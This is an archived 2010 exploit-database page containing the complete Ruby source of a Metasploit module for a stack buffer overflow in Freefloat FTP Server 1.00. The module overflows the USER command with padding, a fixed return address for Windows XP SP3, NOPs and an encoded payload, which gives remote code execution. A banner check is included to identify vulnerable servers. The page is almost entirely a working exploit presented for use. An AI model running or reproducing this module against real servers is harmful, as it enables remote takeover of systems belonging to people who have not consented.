[remote exploits] - Freefloat FTP Server Buffer Overflow Exp
Posted on 08 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Freefloat FTP Server Buffer Overflow Exploit (Meta) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Freefloat FTP Server Buffer Overflow Exploit (Meta) in remote exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=================================================== Freefloat FTP Server Buffer Overflow Exploit (Meta) =================================================== ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Freefloat FTP <= 1.00 Stack Buffer Overflow', 'Description' => %q{ This module exploits a vulnerability in Freefloat FTP service version 1.00. This module uses the USER command to trigger the overflow. }, 'Author' => [ '0v3r', # original version 'Muhamad Fadzil Ramli' # metasploit module ], 'License' => MSF_LICENSE, 'Version' => '$Revision: $', 'References' => [ [ 'EDB', '15689' ], [ 'URL', 'http://www.freefloat.com/software/freefloatftpserver.zip' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'RPORT' => 21 }, 'Privileged' => false, 'Payload' => { 'Space' => 512, 'BadChars' => "x00x0ax0dxffx20", 'StackAdjustment' => -3500, 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3 (EN)', { 'Ret' => 0x5AD86AEB } ], # push esp, ret [uxtheme.dll] ], 'DisclosureDate' => 'December 5 2010', 'DefaultTarget' => 0)) deregister_options('FTPUSER','FTPPASS') end def check connect disconnect if (banner =~ /FreeFloat Ftp Server (Version 1.00)/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit connect print_status("Trying target #{target.name}...") buf = rand_text_alpha(230) buf << [target.ret].pack('V') buf << make_nops(16) buf << payload.encoded #buf << rand_text_alpha(1000 - buf.length) #send_cmd( ['USER',buf],false ) send_user(buf) handler disconnect end end # <a href='http://1337db.com/'>1337db.com</a> [2010-12-08]</pre></body></html>
